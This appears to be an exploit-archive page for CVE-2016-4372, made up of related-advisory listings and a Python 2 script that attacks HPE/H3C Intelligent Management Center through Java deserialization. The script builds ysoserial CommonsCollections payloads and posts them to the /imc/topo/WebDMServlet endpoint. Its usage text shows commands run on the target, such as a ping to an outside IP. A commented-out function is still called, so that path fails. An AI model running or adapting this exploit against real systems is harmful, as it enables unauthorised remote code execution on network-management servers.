HPE < 7.2 - Java Deserialization Exploit

🗓️ 19 Sep 2017 00:00:00Reported by Raphael KuhnType

zdt🔗 0day.today👁 45 Views

HPE/H3C IMC Java Deserialization Exploit version 0.1 for Windows Server 2008 R

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2016-4372	6 Jan 202422:32	–	circl
CNVD	HPE IMC ACC Remote Code Execution Vulnerability	17 Jul 201600:00	–	cnvd
CVE	CVE-2016-4372	15 Jul 201616:00	–	cve
Cvelist	CVE-2016-4372	15 Jul 201616:00	–	cvelist
Tenable Nessus	H3C / HPE Intelligent Management Center Java Object Deserialization RCE	23 Aug 201600:00	–	nessus
Tenable Nessus	HP Intelligent Management Center Java Object Deserialization RCE	24 Aug 201600:00	–	nessus
Imperva Blog	Deserialization Attacks Surge Motivated by Illegal Crypto-mining	24 Jan 201817:45	–	impervablog
NVD	CVE-2016-4372	15 Jul 201616:59	–	nvd
OSV	CVE-2016-4372	15 Jul 201616:59	–	osv
Prion	Design/Logic Flaw	15 Jul 201616:59	–	prion

#!/usr/bin/env python
 
########################################################################################################
# 
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
#    Tested on Windows Server 2008 R2
#    Name   HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
# 
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
 
import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
host         = "127.0.0.1:8080"
payload_file = "payload.bin"
body        = ""
 
def printUsage () :
    print "......................................................................................................................"
    print "."
    print ". HPE/H3C - IMC Java Deserialization Exploit"
    print "."
    print ". Example 1: -payload-binary"
    print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
    print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
    print ".     1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
    print ".        java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
    print ".     2. Send request to server"
    print ".        %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin"  % sys.argv[0]
    print "."
    print ". Example 2: -payload-string"
    print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
    print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
    print ".     1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
    print '.        %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"'  % sys.argv[0]
    print "."
    print "......................................................................................................................"
 
def loadPayloadFile (_fileName) :
    print "[+] Load payload file %s" % _fileName
    payloadFile = open(_fileName, 'rb')
    payloadFile_read = payloadFile.read()
    return payloadFile_read
 
def exploit (_payload) :
    url = sys.argv[1]
    url += "/imc/topo/WebDMServlet"
    print "[+] Sending exploit to %s" % (url) 
    data = _payload
    response = requests.post(url, data=data, verify=False)
    return response
 
#def showResponse(_response):
#    r = response
#    m = r.search(_response)
#    if (m.find("java.lang.NullPointerException")):
#        print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
#    else:
#        print "[-] ClassCastException not found, exploit failed"
 
 
if __name__ == "__main__":
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)
    else:
        print "------------------------------------------"
        print "- HPE/H3C - IMC Java Deserialization Exploit -"
        print "------------------------------------------"
        host = sys.argv[1]
        print "[*] Connecting to %s" %host
    if sys.argv[2] == "-payload-binary":
        payload_file = sys.argv[3]
        if os.path.isfile(payload_file):
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            showResponse(response.content)
        else:
            print "[-] Can't load payload file"
    elif sys.argv[2] == "-payload-string":
            if os.path.isfile("ysoserial.jar"):
                sPayload = sys.argv[3]
                sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
                print "[+] Create payload file (%s) " %sPayload
                os.system(sPayload)
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                print "[+] Response received, exploit finished."
            else:
                print "[-] Can't load ysoserial.jar"
    else:
        printUsage()

#  0day.today [2017-12-31]  #

19 Sep 2017 00:00Current

9.2High risk

Vulners AI Score9.2

EPSS0.10201